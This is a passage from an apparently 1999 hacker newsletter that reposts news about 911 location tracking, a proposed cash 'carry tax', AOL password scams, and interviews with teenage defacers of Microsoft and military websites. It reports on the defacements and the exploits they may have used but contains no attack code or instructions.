http://www.attrition.org/mirror/attrition/ @HWA 23.0 Rubi-Con Wants You! ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by locutus Rubi-Con organizers have issued an official call for speakers. Rubi-Con 2000 is scheduled for April 28-30, 2000 in Detroit Michigan. Speakers even get free goodies like extra free passes for your friends and a free t-shirt. WooHoo! Rubi-Con http://www.rubi-con.org @HWA 24.0 Clinton Signs Phone-Tracking Bill Under 911 Cover ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion A provision of a bill that makes 911 the official emergency number across the country has been signed into law. One provision of this law directs the Federal Communications Commission to help states develop systems that can automatically locate cellular callers who have dialed 911. The new system will probably take advantage of GPS to locate callers. The law also calls for "automatic notification when a vehicle is involved in an accident." (The potential abuses of these new systems is frightening.) Associated Press http://library.northernlight.com/EC19991026990000010.html?cb=200&dx=2006&sc=1#doc Story Filed: Tuesday, October 26, 1999 5:04 PM EDT WASHINGTON (AP) -- President Clinton signed legislation Tuesday making 911 the official emergency number nationwide -- for both regular and cellular phones. The measure also calls for development of technology that can track mobile callers. People with wireless phones now will be able to speed responses to highway accidents, crimes and natural disasters,'' Clinton said. ``Getting rapid care to someone who is suffering from a heart attack or is involved in a car crash can mean the difference between life and death.'' While 911 is widely used as the emergency number for traditional phones, there are 20 different codes for wireless callers across the country. The changes are aimed at cutting response times for the crews who answer 98,000 emergency calls daily from cellular phone callers. ``In my home state,'' said Sen. Conrad Burns, R-Mont., ``three quarters of the deaths in rural areas are because the first responders couldn't get there in time.'' Health care professionals joined Burns at a Capitol Hill news conference to applaud the new law. ``We have great emergency room personnel. We can do a lot for accident victims if we can find them and get them there,'' said Barbara Foley of the Emergency Nurses Association. ``That's what this legislation helps us do.'' Another provision of the act directed the Federal Communications Commission to help states develop emergency systems, including technology that can automatically locate cellular callers who have dialed 911 or been involved in an accident. The FCC in September moved forward with plans to require that cellular 911 calls automatically provide a caller's location. Regulators want manufacturers to begin providing locator technology within two years. Privacy advocates have raised concerns about potential abuse of the technology, which would take advantage of the Global Positioning System developed by the military. The law signed Tuesday called on regulators to establish ``appropriate privacy protection for call location information,'' including systems that provide automatic notification when a vehicle is involved in an accident. It said that calls could only be tracked in nonemergency situations if the subscriber had provided written approval. ``The customer must grant such authority expressly in advance of such use, disclosure or access,'' according to Senate documents detailing provisions of the legislation. An estimated 700 small and rural counties have no coordinated emergency service to call -- even with traditional phones. The bill would encourage private 911 providers to move into those areas by granting the same liability protections to wireless operations that now are offered to wireline emergency service systems. Separately, the FCC took action earlier this year to increase the number of cellular calls to 911 that are successfully completed. The commission required that new analog cellular phones -- not existing phones -- be made with software that routes 911 calls to another carrier when a customer's own service cannot complete the call. Calls sometimes aren't completed because a caller is in an area where his or her carrier does not have an antenna, because networks are overloaded or because buildings or geography block signals. Digital phones, of which 18.8 million now are in use, were not covered by the new FCC rules adopted in May because such phones are more complex than their analog counterparts and there is no easy fix for the problem. Copyright © 1999 Associated Press Information Services, all rights reserved. @HWA 25.0 Carry Tax on Dollars Proposed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Br0k3 A new tax proposed by Marvin Goodfriend, a senior vice president at the Federal Reserve Bank of Richmond would cost you money the longer you held cash without depositing it. This Carry Tax would be deducted from each bill upon deposit according to how long the bill was in circulation. According to Goodfriend this would have the effect of discouraging people who 'hoard' currency, deter black market and criminal activities, and boost economic stability during deflationary periods. (Before you know it they will be putting cellular tracking devices in your money so when it gets stolen it can be recovered.) Wired http://www.wired.com/news/politics/0,1283,32121,00.html Cash and the 'Carry Tax' by Declan McCullagh 3:00 a.m. 27.Oct.1999 PDT WASHINGTON -- US currency should include tracking devices that let the government tax private possession of dollar bills, a Federal Reserve official says. The longer you hold currency without depositing it in a bank account, the less that cash will be worth, according to a proposal from Marvin Goodfriend, a senior vice president at the Federal Reserve Bank of Richmond. In other words, greenbacks will get automatic expiration dates. "The magnetic strip could visibly record when a bill was last withdrawn from the banking system. A carry tax could be deducted from each bill upon deposit according to how long the bill was in circulation," Goodfriend wrote in a recent presentation to a Federal Reserve System conference in Woodstock, Vermont. The 34-page paper argues a carry tax will discourage "hoarding" currency, deter black market and criminal activities, and boost economic stability during deflationary periods when interest rates hover near zero. It says new technology finally makes such a scheme feasible. "Systems would have to be put in place at banks and automatic teller machines to read bills, assess the carry tax, and stamp the bills 'current,'" the report recommends. Goodfriend said in an interview that banks might place a kind of visible "date issued" stamp on each note they distributed. "The thing could actually stamp the date when the bill comes out of the ATM," he said. Congressional critics say they would oppose any such move. "The whole idea is preposterous. The notion that we're going to tax somebody because they decide to be frugal and hold a couple of dollars is economic planning at its worst," said Representative Ron Paul (R-Texas), a free-market proponent who serves on the House Banking committee. "This idea that you can correct some of the evil they've already created with another tax is just ridiculous," Paul said. Other economists say a carry tax is not a wise plan. "This is going beyond taxing banks for holding reserves. It's taxing the public for holding currency too long. That's even more wild an idea," says George Selgin, a University of Georgia economics professor who specializes in monetary policy. "There are sweeping implications of these suggestions beyond whatever role they might play in thwarting a deflationary crisis... I think it's a very dangerous solution to what may be a purely hypothetical problem," Selgin said. Goodfriend discusses an alternative: The Fed should at times prevent Americans from withdrawing cash from their bank accounts. "Suspending the payment of currency for deposits would avoid the cost of imposing a carry tax on currency." But he concludes that such a move would have "destabilizing" effects, and recommends that the Federal Reserve instead "put in place systems to raise the cost of storing money by imposing a carry tax." The idea has been discussed before. Economist John Keynes mentioned the possibility, but dismissed it because of the administrative hassles involved. Silvio Gesell, a Keynes contemporary and like-minded thinker, also suggested taxing money to allow lower interest rates. But Goodfriend says that technology has advanced since then. "In light of recent advances in payments technology and the less-than-satisfactory alternatives, imposing a carry tax on money seems an eminently practical and reasonable way [to proceed]," he writes. He said the Federal Reserve has technology that would make it "feasible," but refused to give details. One reason for a carry tax, he says, is the reduced influence of the US central bank when prices are not increasing and inflation is close to zero. During such a period, banks are less likely to make loans -- even if the Fed tries to spur an economic expansion through open market operations. But if the government taxes the currency holdings of individuals and banks through an occasional carry tax, they may be inclined to lend money even at a negative interest rate in order to avoid holding on to it. "This proposal is made well in advance of any problem we have in the US. It's not an emergency proposal at this point," he said. The report says Congress would have to pass legislation allowing such a tax. @HWA 26.0 $250 Million in Police Tech Approved ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Br0k3 Part of the $39 billion fiscal 2000 appropriations bill that funds the departments of Commerce, Justice and State includes $250 million for law enforcement technology. $130 million of the money will be used for the Crime Identification Technology Program which will help local communities participate in national crime databases and improve crime laboratories. Monies are also earmarked for upgrades and increased management of various systems as well as development of multi-jurisdictional, multi-agency communications systems. Civic.com http://www.civic.com/news/1999/oct/civ-law-10-26-99.html Congress Approves $250 Million for Law Enforcement Technology October 26, 1999 The House and Senate last week approved $250 million in funding for law enforcement technology as part of the $39 billion fiscal 2000 appropriations bill that funds the departments of Commerce, Justice and State. The $250 million compromise bill, approved during a House/Senate conference, comes after the original House version of the bill proposed taking $60 million from a trust fund to bankroll the high-tech projects and the Senate version earmarked $350 million for the effort. According to the conference report, $130 million will be used for the Crime Identification Technology Program, which was born out of the 1998 Crime Identification Technology Act. The act established a five-year, $1.25 billion grant program for state and local governments to help local communities participate in national crime databases and improve crime laboratories. Congress also included specific language in the report that outlined various uses for the money, including upgrades to criminal history and criminal justice record systems; improved management of criminal justice identification, such as fingerprint-based systems; integration of national, state and local systems for criminal justice purposes; and development of multijurisdictional, multiagency communications systems. U.S. Sen. Mike DeWine (R-Ohio), a former prosecutor, championed the bill, which gained House and Senate approval Oct. 22. "It is crucial [that] the dedicated men and women who are on the front line of crime-fighting efforts have access to advanced technology," DeWine said. "Crimes today are being committed with the use of technology, so it only makes sense that they be solved with advanced technology." The bill also provides funding for two $7.5 million grants that cover individual state efforts in high-tech law enforcement. Kentucky received a grant for a statewide law enforcement program, and the Southwest Alabama Department of Justice will use the money to integrate data from various criminal justice agencies. States also will receive $30 million in grants to reduce their DNA backlogs and for the Crime Laboratory Improvement Program. The bill also includes $15 million for Safe Schools technologies, which are geared toward providing more effective safety techniques in the nation's schools, and $35 million for the Brady Act to upgrade criminal history records. -- Dan Caterinicchia (danc@civic.com) @HWA 27.0 Interview With Web Inventor ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Deepquest Forbes magazine has an interesting interview with Robert Cailliau, the co-inventor of the World Wide Web. In the article Cailliau proposes some radical ideas, everything from a pay per page model of the internet to licensing all internet users. Forbes http://www.forbes.com/Forbes/99/1101/6411112a.htm Regulate the Internet? The very idea sends shivers down a lot of spines. But one of the Web's inventors argues that only regulation can save it from its own excesses. Bring in the Cyberpolice By Christopher Watts CYBERSPACE IS GETTING SCARY. Those sleazy porn sites. Viruses. Gaudy ads. Unstoppable spam e-mail. You click "okay" on an e-commerce item and hope that your money doesn't vanish into some Internet bandit's account in Lagos. If things get much worse, logging on to the Net may be as perilous as straying into a bad part of town after dark. An exaggeration? Robert Cailliau, the co-inventor of the World Wide Web, doesn't think so. "There was a time when the community that was on the Net was homogenous and civilized," sighs Cailliau. "Now it's not. We're in the middle of chaos. It may calm down. But the alternative is that there's a total meltdown of the system and that it becomes unusable. That would be a catastrophe. We must regulate [the Web] if we want to have some civilization left. And it's getting urgent." As staffers in the early 1990s at Geneva's European Laboratory for Particle Physics (a 20-country research collaboration known by its French acronym, CERN), Cailliau and a now high-profile British colleague, Tim Berners-Lee, developed the address formats and other standards to create the World Wide Web. Berners-Lee is now at the Massachusetts Institute of Technology and has just published a book titled Weaving the Web: The Original Design and Ultimate Destiny of the World Wide Web by its Inventor (HarperCollins, San Francisco). Today the lower-profile Cailliau, a 52-year-old Belgian native, heads Web communications at CERN and spends much of his time with the International World Wide Web Consortium, a standards-setting body. How would Cailliau make the Web more civil and less chaotic? His controversial idea is that we should find some means other than banner ads to finance it. "The forced influence of advertising has given us completely useless TV," he notes. "You don't want that on the Net. But most on-line information providers need to attract advertising--which slows downloads and clutters the screen with windows." The bandwidth explosion will solve the speed problem, but it won't address the clutter problem. To reduce the Web's dependence on advertising, Cailliau proposes a so-called micropayment system, wherein Web surfers would pay a few cents every time they download a page from the Web. "It would change the landscape completely if [Web-site owners] could live by providing a high-quality, responsive service," says Cailliau. License all Internet users the way automobile drivers must be licensed.... How would the micropayments idea work? Cailliau replies: "An article from a newspaper would [cost users] something on the order of a cent or less, but a really hot item could be several cents, depending on what the author thinks he or she can get away with. If you find it too expensive, you go somewhere else. The site that's too expensive loses clients." Cailliau points to France's Minitel system, which operates over France Telecom's wires. From public or private terminals, Minitel users pay modest amounts for access to information on everything from movie schedules to restaurant reviews--with not an ad in sight. "You know what you're going to pay, and you know what you're going to get," says Cailliau. But doesn't Minitel charge users according to time spent on-line, rather than per-page fees? "That's the wrong model," Cailliau concedes. "But even that bad model has been shown to be commercially successful--even today, parallel to the Web. I always believed that if we did not have the telecom monopolies in Europe at the time of Minitel's introduction--if anyone in all of Europe could have subscribed to it--it would have spread like wildfire. 'Minitel Version Two' would have been what the Web is now." Cailliau's other proposal to save the Web from its own success: License all Internet users, the way automobile drivers must be licensed to use public streets. In defense of this controversial idea, Cailliau says: "To get a license, people would have to learn basic behavior: choosing an Internet service provider; connecting to the Web; writing e-mails; problem diagnosis; censoring your own computer; and setting up a site. More important than that: knowing what dangers to expect and knowing how the Internet can influence others." But wouldn't licensing, by making Internet users more traceable and accountable, run counter to the free spirit of the Web--which helped it develop so rapidly? And wouldn't licensing also crimp the Internet's power to fight Big Government's power? Perhaps. But Cailliau does insist on pointing out this: "If you operate a TV or radio station, you have to have a license. It has nothing to do with fundamental freedom. It has to do with protection of the average citizen against abuses." Cailliau continues: "Everybody thinks that licenses are perfectly all right on the roads, because of the danger to life and limb. But one can equally cause a lot of harm by spreading false and dangerous information. Sooner or later someone is going to be able to trace the death of a person to an Internet act. Then [the licensing question] will probably be taken seriously." @HWA 28.0 Computer Attacks Up Sharply in Hong Kong ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by evilwench In the first eight months of 1999 there have been 138 reported cyber attacks compared with only 18 for all of last year, reported Senior Inspector Paul Jackson of the Police Computer Security Unit in Hong Kong. South China Morning Post http://www.technologypost.com/personal/DAILY/19991027102522210.asp?Section=Main Published on Wednesday, October 27, 1999 PERSONAL COMPUTING Hackers step up attacks on SAR ERIC NG The number of computer-hacking cases reported to police in the first eight months of this year was 138 compared with 13 for the whole of last year. Senior Inspector Paul Jackson of the Police Computer Security Unit disclosed the figures yesterday during a seminar on Internet-related data protection organised by the Federation of Hong Kong Industries. While the figures might suggest more organisations were willing to report hacking crime than previously, Inspector Jackson said "far too many organisations do not report hacking cases for fear of bad publicity". He did not give figures on damage suffered by victims, saying it was difficult in many cases to qualify the monetary losses. The number of cases involving the private sector was not revealed. Inspector Jackson cited one case under investigation in which the network of a large SAR organisation had suffered multiple hacking attacks for three months early this year before they were discovered. "The source of the attacks was from overseas, but we don't know all the things the hacker might have done and therefore cannot be sure of the extent of damage," he said. Meanwhile, an Internet auction case, still under investigation, involved Hong Kong fraudsters and multiple victims worldwide. The number of Internet shopping fraud cases reported in the first eight months was 13, compared with one for the whole of last year. Inspector Jackson said the application of laws on e-commerce fraud cases had been difficult as new types of frauds appeared all the time. "We are on a big learning curve [on e-commerce cases]," he said. Inspector Jackson said his unit had maintained a close liaison with SAR Internet service providers and was trying to set up an informal group for them to share their experiences on computer crime and solutions. Another speaker at yesterday's seminar, Director of Information Technology Services Lau Kam-hung, said the Government would set up its Secure Central Internet Gateway early next year, adopting internationally accepted security standards. "It will protect the government bureaus and departments by means of fire-walls, virus-detection systems and pro-active intrusion-detection systems," he said. Wired; Crackers Penetrate MS Site Wired News Report 4:00 p.m. 26.Oct.1999 PDT Microsoft Web site cracked! For first time ever, a Microsoft site defaced! Says so right there in Tuesday's tech media headlines. Well, sort of. Not really, said Microsoft. "No part of the Web presence of Microsoft was compromised," said spokesman Adam Sohn. "There's no new vulnerability here." Then how to explain the message, "flipz was here and f0bic, your seksi voice helped me through the night heh. Save the world. Kill Bill," that appeared on a Microsoft's "Conference Management Server" Web site? The answer, according to Microsoft, is that the site was indeed cracked. But it belonged to a lone Microsoft engineer's "test box," a standalone Web server the engineer used to test code. The server was not connected to either Microsoft.com or MSN.com or the Microsoft Intranet. There are many such standalone servers, said Sohn, all of them outside the corporate Web ring. "Obviously, this one was not properly patched," said Sohn. "The guy who put up the site, while he obviously knows a lot about information technology, probably wasn't paying too much attention" to security. Nothing was compromised, said Sohn. So, properly speaking, fortress Microsoft.com remains unbreached -- at least by Web site spoofers. It's not for lack of trying, said a weary-sounding Sohn. "People are banging on us constantly, all day, everyday from everywhere around the world." @HWA 29.0 AOL Password Scams Abound ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Remember the grandmother from Kansas City, North whose AOL account was used to send thousands of porn SPAMs? Well AOL password thieves have not stopped their shenanigans, everything from free offers to web page redirects to trojan horses, the methods are wide and varied but still abound. Kansas City Star http://www.kcstar.com/item/pages/business.pat,business/3773f414.a25,.html DAVID HAYES: BITS & BYTES Many Internet scams result in password theft By DAVID HAYES - Columnist Date: 10/25/99 22:15 Betty Anne Brown wants to make one thing perfectly clear: She is not the infamous Porno Grandma. But for a brief time last month, hackers made it look as if she was playing one on America Online. About 3,500 AOL subscribers across the country received e-mail from Brown's AOL account in September suggesting they go to a Web site offering "XXX Porn, For Free, For Real." The Kansas City, North, mother and grandmother became one of thousands of AOL users who have been victimized by password thieves -- low-tech computer hackers who steal passwords to break into AOL accounts. "I'm a very straight lady," the 66-year-old grandmother said. "It was a little embarrassing." Brown thinks the password theft happened while she and her husband, Linn Brown, were traveling in Italy in September. The couple stopped at a storefront shop in Rome that offered Internet access for $5 an hour. "It seemed like such a great opportunity when we were traveling," Brown said. "Postcards take so long to get back." However, Brown thinks that while she was writing to friends and relatives to tell them about the trip, a hacker nabbed her login and password. Stealing passwords, sometimes called "password fishing," is nothing new for AOL or other online services. However, as the number of AOL customers grows -- AOL announced Monday that the service now had more than 19 million subscribers -- the number of potential targets is growing also. Some hackers use the passwords to break into accounts as they attempt to steal credit card numbers. Some use AOL e-mail to send out spam promoting adult Web sites or to try to steal additional passwords. And some just do it for kicks. In the case of Brown, the thief sent out a porn notice. But a check found that the site, which had been set up on the free Angelfire community Web site, was apparently set up to steal credit card information. It was an adult Web site that requested credit card information -- but didn't really exist beyond the sign-up screen. The site has since been closed by Lycos Inc., which owns and operates the Angelfire site. Brown said she discovered the scam when she started receiving irate e-mail from people who had received the notices from her account. She looked in her "sent mail" folder and found hundreds of sent e-mail notices, all alphabetized. She wrote those who complained to apologize. "I don't know if they read it or not, but I thought it was the right thing to do," she said. The Browns changed their passwords and assumed the problem was over. But just last week, AOL finally caught on to the problem and suspended the Browns' accounts. The couple found out about the suspension when they discovered that their passwords didn't work. They called AOL and explained the situation, and AOL restored their service. Security always has been a big problem for AOL. "It's been said, accurately, that AOL is a marketing company, not a technology company," said David Cassel, editor of AOL Watch, an e-mail newsletter with 50,000 subscribers. In the "neighborhood watch" area of AOL, the online service lists dozens of scams used to steal passwords. Many read like this one: "Dear America Online Member, "Your account was given 6000 Minutes of America Online credits. This means you get AOL for free for 6000 minutes! Just Click Here to confirm the credit. Thank you America Online user." Most likely, that link took the user to a site set up specifically to steal a user's password. That's the fastest growing scam on AOL. An e-mail provides a Web site link and asks the person who receives it to click on the link. Some of those links lead to Web sites that quietly download a "Trojan horse" program that goes into a user's computer and looks to see if that person stored their AOL password on the hard drive. Others lead to bogus Web sites that look like AOL and ask the user to log in. Some are bogus adult sites that ask for credit card information. The AOL neighborhood watch area was set up in response to a growing number of attempts to steal user passwords and credit card information. "Never click on a link in an e-mail," said Rich D'Amato, an AOL spokesman. "AOL will never ask for your password or user name. Anyone pretending to ask for that information is not from AOL." D'Amato suggested that surfers using the Microsoft Internet Explorer Web browser set the security setting on their software to "medium" or higher. The security setting, on the browser's toolbar under "tools" and then "Internet options," alerts users to any download that could be dangerous. AOL also provides a free trial version of a virus software that users can download. The software, which expires after 30 days, can be downloaded each month for free, D'Amato said. In Brown's case, it's possible her password was stolen by a hacker who installed a program on the computer in Rome that records each keystroke made by a user. The information can be retrieved remotely. D'Amato said users who travel should carry a copy of their virus software and its updates, and install the software on any computer they use to check for such programs. Cassel, however, thinks AOL creates some of its own problems by being too secretive about the extent of the company's security problems. "AOL is very publicity sensitive," Cassel said. "It creates the ideal atmosphere for hackers to operate in." The experience hasn't dampened the Browns' enthusiasm for the Internet or AOL. The couple uses AOL to keep in contact with grandchildren, children and relatives, and for general research. "I wanted people to know what can happen," Brown said. "It would have been so easy just to change my password and avoid all this." To reach David Hayes, technology reporter, call (816) 234-4904 or send e-mail to dhayes@kcstar.com @HWA 30.0 United Loan Gunmen Return ~~~~~~~~~~~~~~~~~~~~~~~~~ Note: the ULG is erroneously referred to as the "United Lone Gunmen" the correct name is United Loan Gunmen, substitute where necessary - Ed From HNN http://www.hackernews.com/ contributed by Code Kid More new interesting defacements have joined the one done of the Microsoft site last Sunday. The Web Site of George Magazine has been defaced by the United Lone Gunmen, additional defacements included U.S. Navy Coastal Systems Center, Andersen AFB, and a slew of others. Statement by ULG - via OSALL http://www.aviary-mag.com/News/ULG_Speaks/ulg_speaks.html Interview with Flipz - via OSALL http://www.aviary-mag.com/Interviews/Flipz/flipz.html Yesterday morning HNN mentioned that a Microsoft web page had been defaced two days prior. Not really big news, web page defacements happen on a daily basis, but the mainstream media picked it up and thought it was important enough to run a two day old story. Here are some of the links. MSNBC http://www.msnbc.com/news/327726.asp?cp1=1 UOL - Brazil http://www2.uol.com.br/info/infonews/101999/26101999-19.shl ABC http://abcnews.go.com/sections/tech/DailyNews/mshack991026 Wired http://www.wired.com/news/technology/0,1282,32142,00.html Ultimahora - Portugal http://ultimahora.publico.pt/barra-central.asp?id=5883 Statement by ULG ULG Speaks 10/27/99 ULG [Editor´s Note: The following is an exclusive statement given to OSAll by members of United Lone Gunmen. This statement is in regard to the recent defacement of George Magazine by ULG. A mirror is available at Attrition.] The reason behind the georgemag.com hack was more of a pro-hack than a hack bashing the administrator/organisation/etc. We of ULG believe JFK Jr. was murdered in his plane by a bomb implanted before take off. Shortly after he radioed into the tower saying everything was fine, the tail was blown off, causing his demise, as well as his passengers. ULG believe the bomb was planted by CIA in accordance with the Bush Administration in an effort to 'shut him up'. JFK Jr. supposedly wanted to run for president, and knowing he would have a supreme chance at winning, the Bush Administration could not allow this. Being that there is a ungodly amount of money put into Bush's campaign, they were forced to kill him. This is only conspiracy theory, and may not lead no where, but should Bush win... it will bring more thought to this theory. Interview with flipz; Interview With Flipz 10/27/99 Mike Hudack Editor-in-Chief Flipz is a young man who both goes to school and moonlights as a systems analyst somewhere. He´s got a bright future for someone only fifteen years old [Editor´s NOTE: As the writer of this article, I must admit that I am but sixteen years old.]... And, at that young age, he has been covered in MSNBC, Ziff Davis, Slashdot and so many more. At that young age he´s made history as the first person to deface a Microsoft Web page -- ever. "I do it for fun, just like everyone does it for fun," Flipz said in an effect to explain why he defaces sites, "we don´t do it because we have to, we don´t do it because we want to, we don´t do it because it´s fun." He says that his first defacement was when he was around ten or eleven -- that time a Solaris machine. He cnows that he hacs but doesn´t now that he´s defaced servers? Andersen Air Force Base "Hold on five seconds, I´ll tell you," he told me when I asked if anything else was happening soon. After a couple affirmatives and a few obscenities he informed me that he´d just gotten his latest defacement. "Andersen.af.mil," he calmly told me. It was just the latest in a string of sites he had previously held root on. Apparently something has happened in Flipz´ life to make him want to just throw it all out. "It´s been tough," he said. "I just wanted to have some fun," let out some pent-up aggression. Microsoft Now it seems that he targets Microsoft NT boxes exclusively, explaining that he hates Windows NT -- and that Windows 2000 pisses him off even more. The thing that Flipz is most famous for right now is defacing the first Microsoft site ever. He was on the phone with someone when he defaced it... When he heard it was the first he was excited, but not suprised. "I kind of knew it, but I didn´t know it," he says about the defacement. High Profile Like the Microsoft defacement, all of Flipz´ attacks have been attention garnering, although none so much as that. He´s attacked numerous military sites, including from the Navy and Army. In addition he´s defaced two Department of Energy Web sites and the Duracell Battery Company, among others. Law Enforcement It was a couple months ago when Flipz defaced People´s Bank, a relatively small Connecticut bank. Somewhat aftewards Attrition.org was subpeonaed for any records they may have pertaining to Flipz and the defacement. When I told him about the subpeona Flipz was rather shocked that the FBI hadn´t raided him yet. "It´s been a while... you´d think they would have at least stopped me after White Sands [Missile Base.]" The FBI didn´t though. At one point during our conversation Flipz thought he was being raided as a black van rounded the corner to his house. It turned out to be nothing, however. "I´m just sitting on edge, waiting for them to raid me," he said. He explained that he hadn´t done much to cover his tracks because they´d find him anyway. "Why bother with twenty hops when they´ll just issue twenty subpeonas?" And, he added, "even if I cover my tracks well... all they need is one person on IRC to say `oh, I know who this person is.´" The FBI, at this point, doesn´t seem to know Flipz´ identity. They asked me several times in a later interview, and each time came up empty because I didn´t know myself. More is available on the FBI. Skills Some people on IRC have questioned Flipz´ skills. Flipz says that he "works with NT on a daily basis [as a] systems analyst" but others aren´t too sure. "He´s demonstrated no real NT skills," said one IRCer who knew flipz but wished to remain anonymous. This IRCer said that all the defacements were on NT systems running IIS, insinuating that Flipz was simply using the eEye exploit released earlier this year. But Flipz mantains that "I´m not using IIS, I´m not using FrontPage, I´m not using FTP exploits..." Rather, he says he´s using "some exploits modified for my own use and a private one or two." More detail on his methodology, or speculation thereof, is available. More to Come This article was put together in the ten or fifteen minutes after I got off the phone with Flipz. This article is to be considered a work in progress and will be updated and mantained throughout the day as more work can be done on it. MSNBC; Don’t blame love for Microsoft hack Teen tells MSNBC that personal problems drove him to deface By Mike Brunker MSNBC Oct. 27 — The hacker who broke into Microsoft’s computers and publicly bragged about it says it was personal problems — not unrequited love — that led him to attack the computer giant. “Some bad things have been happening in my life and I just figured I’d go on the Internet and escape reality and see how much trouble I can get into,” the hacker, who gave his age as “under 16,” said Wednesday in an interview with MSNBC, hours after he vandalized four more government Web sites. THE HACKER, who uses the handle “flipz,” on Tuesday became the first person known to have defaced one of Microsoft Corp.’s computers after he left electronic graffiti on the company’s Conference Management Server site. He also is responsible for vandalizing at least 10 government Web sites since Oct. 20. Sources at the Redmond, Wash.-based company said the hacked machines were not part of the corporate network, but rather part of a “direct-tap network” used by developers and partners for testing purposes. Though efforts are made to keep them secure, these computers are connected directly to the Internet, and are one step removed from Microsoft’s corporate network, the sources said. (MSNBC is a joint-partnership between Microsoft and NBC News.) In a phone interview Wednesday, flipz confirmed his identity by providing details of a previously unreported intrusion into the Web site of a leading Internet search engine. His account was subsequently confirmed by officials at the company on the condition that the site not be identified. REPORTED, BUT NOT DOCUMENTED Attrition.org, a reliable computer security site that maintains an archive of hacked Web sites, also confirmed that flipz reported he had vandalized the site, but it was not documented because the hacked site was removed before evidence could be gathered. Flipz took issue with the MSNBC’s portrayal of him as a “lovesick hacker” in a story Tuesday reporting the Microsoft break-in, a description based on what appeared to be love notes for another hacker known as “f0bic” that he left on some of the sites he vandalized. “Flipz was here and f0bic, your seksi (sic) voice helped me through the night,” read one note left on the Microsoft Web page, which concluded with a threat against CEO Bill Gates. “That was just a bit from ‘Austin Powers.’ We don’t have a sexy relationship or anything. He’s just like my friend,” flipz said, adding that f0bic, a member of the apparently defunct hacking group Spl0it, had nothing to do with his intrusions. The hacker was vague on many specifics about his life and the reasons for the attacks — he would only say he lived on the West Coast, he declined to give his age except to say he is “under 16,” and he refused to provide specifics of how he was able to gain entry into the NT servers, though he said he had been trained as an NT operator. HACKING IS ‘LIKE A DRUG’ He blamed unspecified personal problems for the spate of intrusions, adding that staying up all night hacking was “like a drug” that allows him to forget about life’s demons. “You just forget everything. Everything. You can’t remember your name and s—-. Everything changes.” He said his parents were not concerned about his nocturnal activities, noting that they had told him, “Get good grades, don’t drop out of school and we’ll be happy.” As he has indicated in messages left on several of the hacked sites, flipz said he expected to be arrested as a result of his hacking spree. “I was expecting to get raided yesterday, but nothing happened so I don’t know. ... I’m a minor so I’m not really worried about that,” he said. The FBI declined to say whether flipz was under investigation, but a spokesman for the White Sands Missile Range said the Army Criminal Investigation Command was looking into the attacks on the service’s computers. FOUR MORE FEDERAL SITES HIT The young hacker continued his assault on federal sites Tuesday night, altering the two Department of Energy sites, the Hanford Nuclear Reservation and the Office of Procurement and Assistance Management; the Navy Coastal Systems Center and Anderson Air Force Base, according to attrition.org. In the past week, he also has hacked the pages of the U.S. Army Reserve Command, the White Sands Missile Range, the U.S. Army Dental Care System, the Navy Management System Support Office, the Substance Abuse and Mental Health Services Administration and the Department of Veterans Affairs. MSNBC technology writer Bob Sullivan contributed to this report. @HWA 31.0 Flipz' exploit ~~~~~~~~~~~~~~ Flipz´ Exploit 10/28/99 Mike Hudack Editor-in-Chief Whenever I talk to someone about the recent spate of government Web defacements one of the first things they ask me is if I know what exploit is being used. The answer is invariably the same -- no. Everyone from eEye to the FBI has asked the same question, and the answer is always the same. The speculation runs from a repackaged eEye exploit to an FTP vulnerability to a custom-made script written by Flipz himself. The answer doesn´t seem to be presenting itself any time soon. An Anonymous Source An anonymous source intimately involved with Flipz and the development of the exploit gave me a call only a few minutes ago. He says the following: "flipz came up with the idea to the exploit, but he doesn't know how to code himself. He then went to someone, probably a member of the ADM Crew, who wrote the actual exploit. It's actually kind of recoded RDS, but [flipz and the rest] not going to release the actual vulnerability." This source explained that F0bic was somehow involved in the development of the exploit, but refused to elaborate on that. Flipz´ Version Flipz categorically refuses to tell me anything about his exploit, explaining that he "can't tell [me] what I'm using." He would, however, say that it "isn´t a hard-core exploit." Apparently it isn´t that complicated -- he says "if someone sat down and looked at this exploit for a few hours they´d call themselves stupid for not thinking of it. It´s very simple." He says the idea came from an article in Buffer Overflow, the Hacker News Networks´ original article section. "It was presented as theory in Buffer Overflow. I just made it reality," he claims. It´s interesting, however, that he has contradicted himself in his zeal to keep his exploit secret. At one point he said "it´s a repackaged exploit," while later he claimed it was from Buffer Overflow. It seems that it would have to be one or the other. The Federals The FBI apparently has no idea what Flipz is using to deface these sites. I was asked by two special agents, one in Washington DC and one in New Haven, CT about what exploit he was using. Both made it relatively clear they had no idea. They seemed to know what they were talking about though, and asked me about a few specific possibilities. I simply told them to check the site if they wanted information. This is all I have to offer. The IRC Opinion In speaking with several security consultants on IRC, it´s pretty clear that most people consider Flipz (and hence his friends) script kiddies. "It´s almost certainly iishack," said one consultant on IRC. The speculation almost refuses to touch the possibility that Flipz wrote the exploit himself. "If anything, it´s repackaged," one person acknowledged. Pretty much everyone refused to be quoted even by pseudonym, saying they weren´t one hundred percent certain. As we all know, in the security community there´s something of a culture against uncertainty. Changing Hands Regardless of what the exploit may be, it has changed hands at least three times. First Flipz had it -- whether he developed it, repackaged it, or downloaded it. He then passed it on to F0bic (who, as far as OSAll can tell, never used it). From there it went to Fuqrag, with Flipz´ permission. @HWA 32.0 Fuqrag interview ~~~~~~~~~~~~~~~~ From OSALL Interview With NSA Defacer 10/28/99 Mike Hudack Editor-in-Chief There have been two firsts in the world of Web site defacements in the last two days. First Flipz defaced defaced a Microsoft server for the first time in history. This flooded the Attrition Mirror with traffic -- more than nine gigs of it. Now someone who calls himself Fuqrag has defaced a National Security Agency Web site. The site defaced by Fuqrag, the Defense Information School, was left largely intact on the face. A splash page asking users to click through was left identical to the original version -- but the page people clicked through to contained the following message: fuqrag 0wnz the DoD!! hello to: hst, vghk, dayzee, zi, flipz, f0bic, microwire, and oclet .. this site was edited by fuqrag .. hakked for cristyn!!! The National Security Agency is responsible for cryptological security for the United States government and is 